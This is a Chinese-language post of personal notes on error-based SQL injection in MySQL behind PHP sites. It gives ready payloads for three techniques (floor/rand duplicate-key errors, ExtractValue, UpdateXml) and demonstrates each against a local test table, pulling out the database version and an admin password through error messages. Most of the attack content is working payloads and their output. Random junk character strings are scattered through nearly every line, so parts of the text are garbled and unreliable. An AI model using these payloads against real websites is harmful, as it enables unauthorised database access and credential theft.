放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
0 D p. P! U6 B3 j: _+ v& U3 O实际测试环境:+ P8 G( i: g( N# D! c f/ b
5 k( }/ Y3 Z6 m% M9 R$ S* i+ O% f 0 ` }6 i1 x& B' M: r& D) w
mysql> show tables;8 A1 {. @; p( K- F' k0 E) |5 o. `
+----------------++ M0 M6 s E& x G1 U. P! p: J
| Tables_in_test |
" {7 z/ u" x% q+----------------+
$ g$ y5 O" P# a2 D- n| admin |! F/ A. M7 ^3 G2 `; q @4 W) o
| article |- h# x8 W7 k% K; H( W
+----------------+
% ~; [/ _, b! p) G0 [; z {: m' m: P. J7 f! L+ Q
! O7 l: t" n5 ]( P& g" J / n( K& p. X/ b- j
mysql> describe admin;# f% r( ]% i Q; T0 v- [
+-------+------------------+------+-----+---------+----------------+( c4 i9 r. s7 N4 l: C/ b6 [3 j5 I
| Field | Type | Null | Key | Default | Extra |" o: A, ^6 M6 D; q1 ^! [' g n
+-------+------------------+------+-----+---------+----------------+- \5 b/ p4 ^( I, `
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
z0 D" Z( C7 }5 B, Z| user | varchar(50) | NO | | NULL | |2 Y# ]3 k" R- L4 z4 S5 ?
| pass | varchar(50) | NO | | NULL | |! B) ? U2 c9 o6 h3 J
+-------+------------------+------+-----+---------+----------------+
0 M1 \* f( f. B% O6 ] + S# }) ^- a$ n9 `" W) K
$ s* I) a6 r! y2 A
/ ?* G% {9 n& _mysql> describe article;
+ M) @! ]5 }. }' M2 C! K" p+---------+------------------+------+-----+---------+----------------+
6 U1 o0 H. [% H1 L" u| Field | Type | Null | Key | Default | Extra |
# H+ w2 _+ o6 } ^7 ]" ]+---------+------------------+------+-----+---------+----------------+
3 V& k; Z- Y7 _- v* D/ y| id | int(10) unsigned | NO | PRI | NULL | auto_increment |1 R. X4 p& B* v h- b% B
| title | varchar(50) | NO | | NULL | |
( Q8 h! C: a5 Z( }4 {* Z. n| content | varchar(50) | NO | | NULL | |0 _3 X7 X3 \5 N
+---------+------------------+------+-----+---------+----------------+, D- `2 X, H5 S7 g( W$ q5 W0 t
1、通过floor报错( E3 i, w2 y0 L2 `& t- a
可以通过如下一些利用代码
" K& W0 Q/ [/ ` I, @5 P 1 k: x4 \9 ?: h/ l! [6 m9 K, V
' w4 l: |. V1 r) q4 Nand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x2 ]6 ] K4 n7 N$ ?
from information_schema.tables group by x)a);
8 y; g6 T) ]- D% e
. n7 D" ?( x+ Y. x( K g " V5 ?4 B' ~ c# E' M2 d: D
and (select count(*) from (select 1 union select null union select !1)x
/ {$ h* A8 m: @" a4 ?$ Jgroup by concat((select table_name from information_schema.tables limit 1),
6 o* W4 O2 j: vfloor(rand(0)*2)));8 {- |2 Z7 e0 {+ K o1 l' T. N e
举例如下:
. p. f1 a7 m4 V4 Y0 U首先进行正常查询:+ o n+ M2 ~ K( N
, o4 M# X7 M7 [7 v8 Q! k6 O5 u5 gmysql> select * from article where id = 1;
+ z9 T: [- f# ?% h+----+-------+---------+
, ~& A' t1 d) l( W/ W8 G# {; ?| id | title | content |0 J4 A6 a( g9 r6 C
+----+-------+---------+
" r2 W6 M5 g) Z* Z. ^3 D/ n| 1 | test | do it |. V g' Y; Y; U5 ]
+----+-------+---------+
, e4 z* S+ T1 _3 G7 i. u7 H2 C假如id输入存在注入的话,可以通过如下语句进行报错。
1 c7 l' }9 K) U7 \3 Z& d6 z# s, U
& M# K$ j% G$ }7 W: u1 N9 [( P4 @& h
* L U4 k" K9 G9 }5 P7 f) gmysql> select * from article where id = 1 and (select 1 from
4 q2 ]# N- a& P) c) b(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 m0 P0 _( z& j! x4 c
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
R& ?! Q( F* u可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* L8 c7 w+ E; q6 t$ a
例如我们需要查询管理员用户名和密码:
3 ]7 R6 u0 ~/ F; W' w* s9 }: tMethod1:7 N m8 w2 { f) A% v) g1 l7 d
7 p9 |1 L; ]( ^( I/ M7 H6 Y% N
* z% \3 e; @, ^( Kmysql> select * from article where id = 1 and (select 1 from; z6 ]7 L, u0 D) q+ @/ Q1 ^) r- T* x
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x% z( w3 d3 u4 O9 U/ E8 r" ?
from information_schema.tables group by x)a);
# _! k$ p- g( T' `/ L JERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
/ Z- A8 Q+ G8 _+ z" Z9 l% B+ eMethod2:! h0 e$ C# Q0 j& C9 R5 X+ z! P5 J
7 n7 j7 e0 I( e7 F5 m 7 m! v9 w& S1 r+ N
mysql> select * from article where id = 1 and (select count(*)7 `3 q* D9 |% M
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
% P1 C% k0 v( \% ^8 @' J- cfloor(rand(0)*2)));$ n# k4 ?% E0 ?7 X) c) i
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'6 l: A( z! j; P: V
2、ExtractValue" H+ F5 @% K4 z
测试语句如下
1 F5 x! z* s4 b w3 G( ~ q
; Y5 P2 Y% F# n( e' I" Y $ p H. x) G, n! \% Z% U& {
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));2 a/ L+ N0 m4 ]3 a' W
实际测试过程
# D# X# ]8 K- [
/ f$ i! | r) D0 }
7 H7 m% B8 Q4 ?! g5 m- k C [mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
9 F2 b+ h" `7 W3 ^* e g" Z(select pass from admin limit 1)));--
, k5 T) i' W' _; V, i2 bERROR 1105 (HY000): XPATH syntax error: '\admin888'
' g9 h" x0 ^- X3 ?9 W& t' h3、UpdateXml
. m: K! y, f1 t4 \测试语句
& e! V% T2 C5 w # K* S; m/ l1 k/ G1 _
1 M) y8 v& q$ j! i
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
: ^7 y/ I. }$ y" R5 B( J5 {实际测试过程
& d( R: F( }9 E+ Z* {/ W7 W( E y, r( A6 J; E) q: g+ d2 l
; n% J8 a9 k0 v" Q9 D/ S3 h( Kmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,8 o# }+ \( j4 C& j; Y
(select pass from admin limit 1),0x5e24),1));
1 T1 S) I, D$ {ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 t; e. P# `# E7 v6 hAll, thanks foreign guys.' M5 H7 ]6 a& e1 \+ \! o
& ~/ P3 t& y2 W! B" p9 s9 s
: a& M: p" ?0 X8 I: t6 x" C& Y
|